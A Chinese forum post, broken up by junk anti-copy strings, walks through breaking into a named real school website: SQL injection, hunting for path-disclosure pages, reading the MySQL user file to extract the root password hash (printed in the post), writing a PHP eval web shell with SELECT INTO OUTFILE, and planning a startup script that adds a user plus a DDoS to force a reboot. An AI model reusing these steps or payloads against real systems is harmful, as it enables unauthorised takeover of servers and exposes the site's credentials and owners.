第一眼看去,好像全是html静态的,都知道静态的根本不好日,多点击几个专栏/ r2 d' W4 D+ f. j
发现这个:http://www.dyyz.net.cn/celebrate/list.php?id=3 -0 -1 判断后确认存在注入!
7 @/ s- [! h+ j8 b% u) A" w$ H; }$ i& @; p4 |/ D* c! R; M1 J
1 ^! r* T' u1 s7 c
5 T! n- f5 G k+ R" }5 a6 R
常规手工不行,尝试突破也不行,利用穿山甲 可以注入:root权限 0 O* z, p! i9 T. F D$ ~% ]0 g
1 D9 n9 I$ R! ?0 d8 Q那么想可以直接写入shell ,getshell有几个条件:
5 ]" H! s' C/ y/ ?& R! C2 [; D1、知道站点物理路径 2、有足够大的权限 3、magic_quotes_gpc()=OFF 4 r0 i: N/ F, L9 z$ [/ k# h; w
( Y# I! w2 r+ h/ x) R% G9 q试着爆绝对路径: ! v* }% p4 [! R9 O% m, l2 A# o
1./phpMyAdmin/index.php?lang[]=1
( j2 w% U- s7 f3 \; U2./phpMyAdmin/phpinfo.php 2 z# l9 M$ @2 o! W- E$ g4 l9 w9 i; z
3./load_file()
1 L9 S& w& g# P/ ?1 p! k1 P9 e" k8 o; h4./phpmyadmin/themes/darkblue_orange/layout.inc.php
- y w2 ?3 r# l2 v5./phpmyadmin/libraries/select_lang.lib.php
# T7 n8 _& y6 ]; T a- `6./phpmyadmin/libraries/lect_lang.lib.php
2 T- a- \) e# c2 W7 E- s- c0 O7./phpmyadmin/libraries/mcrypt.lib.php
$ Z1 C3 B3 B0 S2 N- C, K8./phpmyadmin/libraries/export/xls.php ) f1 Q6 ?2 u3 k V
' V$ d0 n$ h& F9 R2 v4 Y* O! _- `3 Y: Z
均不行...........................
5 {& O; B- f% j6 P$ W# C1 n
% A- Q9 J2 b: V4 [- N( m御剑扫到这个: http://www.dyyz.net.cn//phpinfo.php 获得网站路径:D:/www/phpinfo.php
$ i7 x/ r! a7 A, t0 D L
7 m3 U2 w4 t3 s4 ]6 _& q权限为root,知道网站路径,可是条件3不符合,没法写入shell ,不过服务器存在phpmyadmin 1 l( S* w1 C9 U C8 }
5 d# |; ?% z4 Z. b c6 l默认不行,尝试万能密码:帐号 'localhost'@'@" 密码空 ,登录失败
3 A* f( G. ~1 r" R) F9 q( p+ n" p4 ]+ @) [% L2 ]
敏感东西: http://202.103.49.66/Admincp.php 社工进不去...........
9 z1 i' U+ B% U5 F
: V- R$ p7 u3 y# q$ P想想root还可以读,读到root密码进phpmyadmin 也可以拿shell - H2 B7 J2 O6 _
* L4 G$ |3 v1 r; k- j& Q! L4 x
http://www.dyyz.net.cn//phpinfo.php 泄露了D:\phpStudy\PHP5\php.ini
2 t% e9 w* O4 A4 k1 t C" s$ P* p5 J7 A8 Y# e) q: h+ U0 F
自己修改好读root密码的路径:D:\phpStudy\MySQL\Data\mysql\user.MYD 6 W1 M: n; x. z1 C$ E
' g$ M8 J/ H0 f) x3 N/ \& ]成功读到root密码:
) U. v' i- o# B k8 }5 Q/ Z+ _' c% o- ^. M; K3 d
17---- r(0072)
$ L7 p9 J& M+ p7 k18---- o(006f)
; n6 ]6 d1 O" d: J8 M19---- o(006f) % ~( V t) \/ k8 W9 m3 [) f
20---- t(0074)
8 `+ h7 d& q2 i# c' E# W/ y' u21---- *(002a)
6 H5 w3 B. @6 X22---- 8(0038) v! d9 I5 A! y: K' o2 a: o/ K0 T
23---- 2(0032) 7 W; W& o+ d/ z2 l, Z
24---- E(0045) . V& M* w* p' _: l% v& @) o
25---- 1(0031)
( l2 s& C6 F5 L; q1 M- p% j. @% [) \26---- C(0043) . S% k+ j& `( G# \- u; y0 n1 z9 z
27---- 5(0035) * \( X5 C' q8 T& R/ | X! U
28---- 8(0038) ) x: S$ u! Z8 s3 B+ f2 t# Q
29---- 2(0032)
9 {& q v& W4 E9 p30---- 8(0038)
/ _: a) f9 i0 S: V( F( e. i; B31---- A(0041) 3 X& L! b8 @" C1 P0 Y: `
32---- 9(0039) ' e1 o: E( m; ]0 [, z
33---- B(0042)
' B6 h6 `: D0 i34---- 5(0035)
4 [2 i- U* W5 e- u" p7 d( P2 K35---- 4(0034) 9 f {& m$ [7 o1 v! M/ Z
36---- 8(0038) . U0 v: N0 `7 i3 {* L8 k u3 l
37---- 6(0036)
0 v- w* L+ U7 s3 L' A38---- 4(0034)
+ g# C) K( J, @9 y' k; i; }39---- 9(0039)
3 O, w/ W7 m/ @; L, z# }/ b40---- 1(0031)
/ J( O6 u% T" C! F: J5 K0 Q41---- 1(0031)
9 o0 D9 E2 p+ p2 t: u42---- 5(0035) , R: `. ^2 p6 y7 |" S( y0 d
43---- 3(0033)
$ \4 |% F' d7 f9 O9 ` [0 k2 r44---- 5(0035) . W0 n6 r1 X# e# O
45---- 9(0039)
) v+ f; \2 w5 H7 X* a46---- 8(0038) & ]- N1 h# H$ ]* p* l8 [, B5 X
47---- F(0046) + N. n2 k1 E/ [ `/ A E* o, S
48---- F(0046)
6 `3 ^' h' E. a0 m4 c49---- 4(0034) + a8 [! v' F2 U! o( y( H( l0 j
50---- F(0046)
; l1 s6 }9 S3 U' I; }2 L7 B; a: }0 f/ |51---- 0(0030) # P. f. t9 P$ _/ X( u5 c
52---- 3(0033) , m6 H- e8 M' S3 I
53---- 2(0032)
( E H, e+ r H7 o( [/ t54---- A(0041) ) g) I' ?; w! Y+ @- H+ ?2 L) F# n, W
55---- 4(0034) / L2 y. E) d# B" Z; c( ~- w0 E3 T
56---- A(0041) % d/ i! s }/ ], V8 k/ [
57---- B(0042) # p6 A. f* ~2 I$ O# Y( K" k: v
58---- *(0044)
4 g' w% v6 b' A- u59---- *(0035)
8 v1 O9 ^7 v B+ w60---- *(0041) 9 f7 a7 O0 g* O+ V4 O, t& w. P2 i
61---- *0032) . q. S& J0 K8 ]) r9 a
# e# \6 z0 D! a5 m9 F5 t$ O J5 V
解密后成功登陆phpmyamin
* E* a; b3 {6 |/ n3 `2 q) s2 Z
( \ u: |: j4 d8 a5 |
" D% j( K* L' R' I1 ?9 _ _: ? + B9 p4 o- T) H/ \6 R
$ O/ Z4 {) @2 @- H* l5 W2 h找到mysql数据库,执行sql语句:elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php'
8 E! p/ W# _, N" l9 y( M
! I) l d0 h; E4 l& P M2 o! q! v# H成功执行,拿下shell,菜刀连接:
8 A, Z1 V. M& {: u! v3 D$ |5 O8 P" D; D' t7 @6 B! d$ C
服务器不支持asp,aspx,php提权无果...................
9 p1 h$ i1 `3 d' p
" v$ G% l& H$ m) G: |# W* R但服务器权限很松,上传个远控小马或是一个添加用户的vbs程序到启动里:
; L3 R' _8 d9 z" m: h服务器上已经有个隐藏帐号了 |( J) _ `; s+ B5 I7 B
别名 administrators7 ?+ z% q2 u* i, f+ V" `0 p
注释 管理员对计算机/域有不受限制的完全访问权 ; m" t& o* R. \9 Q* }
成员
7 C/ u/ h: z1 q! h5 |-------------------------------------------------------------------------------
# A" g( l, n6 D8 Tadmin- ? d' Q1 t) w9 r3 p- w
Administrator
8 C- V. p7 {* Z0 Nslipper$5 F1 F0 X& r- W+ |6 j
sqluser
4 @5 {7 j9 G# V4 A1 t3 R& v6 T0 c2 D! n命令成功完成。 , F, h2 q8 o; [
& H. R- H9 b3 ~( ]6 ^( ^& v3 ~服务器权限很松,上传个vbs添加用户的到启动,不要用bat,会开机的时候显示运行批处理的。5 R& N2 y4 j& |. V0 [5 \) \8 F Y
# t6 J! o8 v+ `ddos服务器重启,不然就只能坐等服务器重启了...............................
5 M2 S% r- }. P6 T6 ?% `1 s" X7 ?- E' X: j
3 d) d5 k8 `9 M
|